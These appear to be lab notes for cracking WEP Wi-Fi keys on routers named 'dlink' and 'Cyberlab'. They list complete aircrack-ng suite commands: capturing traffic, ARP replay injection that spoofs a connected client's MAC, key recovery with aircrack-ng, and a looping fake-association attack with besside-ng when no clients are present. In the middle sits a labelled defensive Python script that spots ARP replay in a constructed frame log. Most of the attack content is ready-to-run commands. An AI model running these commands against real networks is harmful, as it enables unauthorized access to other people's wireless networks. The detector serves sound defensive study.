WEP
Using dlink and Cyberlab as targets
ARP Replay
Used when another device is associated with the network.
Run the following to identify connected devices:
airodump-ng --bssid F0:7D:68:44:61:EA -c 6 wlan0mon
In this scenario, 'D0:D2:B0:73:39:9D' was connected to the router.

Multiple windows are required:
Window 1:
airodump-ng --bssid F0:7D:68:44:61:EA -c 6 -w dlink wlan0mon
Window 2:
aireplay-ng --arpreplay -h D0:D2:B0:73:39:9D -b F0:7D:68:44:61:EA wlan0mon
# OR
aireplay-ng -3 -h D0:D2:B0:73:39:9D -b F0:7D:68:44:61:EA wlan0mon
Window 3:
aircrack-ng dlink-01.cap
Leave that running for around 10 minutes and you should capture enough IVs for aircrack-ng to extract the hex password.
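
Seen from the monitoring side, the replay in Window 2 resends one captured frame unchanged, so the same WEP IV recurs from a single transmitter at a high rate. The following is an added example, not part of the original notes: a detector run over a constructed frame log. The log format, thresholds, MAC addresses and the 68/86-byte ARP frame sizes are assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"
ARP_WEP_LENGTHS = {68, 86}   # assumption: usual sizes of a WEP-encrypted ARP frame
WINDOW_S = 1.0               # assumed tuning values, not from the page
THRESHOLD = 20

def parse_record(line):
    """Parse 'timestamp src dst length iv' (a constructed, hypothetical log format)."""
    ts, src, dst, length, iv = line.split()
    return float(ts), src.upper(), dst.upper(), int(length), iv.lower()

def detect_arp_replay(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Return {transmitter MAC: time of first alert}.

    Alerts when one transmitter sends the same IV in ARP-sized broadcast
    frames at least `threshold` times within `window` seconds. Fresh frames
    carry a new IV; a replayed frame is a byte-for-byte copy, so its IV repeats.
    """
    recent = defaultdict(deque)   # (src, iv, length) -> recent timestamps
    alerts = {}
    for line in lines:
        ts, src, dst, length, iv = parse_record(line)
        if dst != BROADCAST or length not in ARP_WEP_LENGTHS:
            continue
        q = recent[(src, iv, length)]
        q.append(ts)
        while q and ts - q[0] > window:   # drop entries older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ts
    return alerts

def constructed_sample():
    """Constructed log: one normal client, one station replaying a single frame."""
    lines = []
    for i in range(5):     # normal client: one ARP request per second, new IV each
        lines.append(f"{i:.3f} 02:00:00:00:00:0A {BROADCAST} 68 {i + 1:06x}")
    for i in range(100):   # replay: identical frame (same IV) every 2 ms
        lines.append(f"{10 + i * 0.002:.3f} 02:00:00:00:00:0B {BROADCAST} 68 a1b2c3")
    return lines

if __name__ == "__main__":
    for mac, ts in detect_arp_replay(constructed_sample()).items():
        print(f"possible ARP replay: transmitter {mac} at t={ts:.3f}s")
```

The alert names the transmitter address carried in the frame, which with `-h` is the associated client's MAC rather than the injecting adapter's, so follow-up should start from signal strength and location, not from the address alone.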

Association attack:
If no clients are connected, you can force your own association by performing the following. This is a super slow attack.
# Dump/sniff traffic from the host and write it to the dlink capture files
airodump-ng wlan0mon --bssid F0:7D:68:44:61:EA --essid dlink -w dlink --channel 6
# Associate using aireplay-ng
while true; do aireplay-ng -1 0 -a F0:7D:68:44:61:EA wlan0mon; done
# OR
# Use besside-ng to force association
besside-ng -b F0:7D:68:44:61:EA wlan0mon